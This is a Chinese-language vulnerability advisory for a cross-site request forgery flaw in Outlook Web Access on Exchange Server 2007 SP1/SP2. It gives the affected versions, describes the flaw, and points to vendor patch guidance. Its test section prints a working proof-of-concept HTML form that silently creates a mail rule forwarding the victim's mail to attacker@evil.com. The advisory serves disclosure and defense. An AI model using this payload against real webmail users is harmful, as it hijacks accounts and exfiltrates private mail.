发布日期：2010-07-08
更新日期：2010-07-09

受影响系统：

Microsoft Exchange Server 2007 SP2
Microsoft Exchange Server 2007 SP1

不受影响系统：

Microsoft Exchange Server 2007 SP3

描述：

---

BUGTRAQ  ID: 41462

Microsoft Exchange Server是一款流行的邮件服务器，Outlook Web Access是Exchange中用于通过Web浏览器读取和发送邮件的工具。

Outlook Web Access在认证用户期间没有充分地验证HTTP请求中的REFERER，没有对HTTP管理CSRF nonce和令牌，用户在有效OWA会话中所访问的网页可以触发提交给OWA的有效请求，导致完全入侵其他用户的邮件账号。

<*来源：Rosario Valotta
  
  链接：http://sites.google.com/site/tentacoloviola/pwning-corporate-webmails
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<form name="myform" method="post" enctype="text/plain" action=https://webmail.mycorporation.com/owa/ev.owa?oeh=1&ns=Rule&ev=Save>
<input type="hidden" name='&#60params&#62&#60Id&#62&#60/Id&#62&#60Name&#62Test&#60/Name&#62&#60RecpA4&#62&#60item&#62&#60Rcp DN="attacker@evil.com" EM="attacker@evil.com" RT="SMTP" AO="3"&#62&#60/Rcp&#62&#60/item&#62&#60/RecpA4&#62&#60Actions&#62&#60item&#62&#60rca t="4"&#62&#60/rca&#62&#60/item&#62&#60/Actions&#62&#60/params&#62' value="">
</form>

建议：

---

厂商补丁：

Microsoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/technet/security/

浏览次数：2912
严重程度：0（网友投票）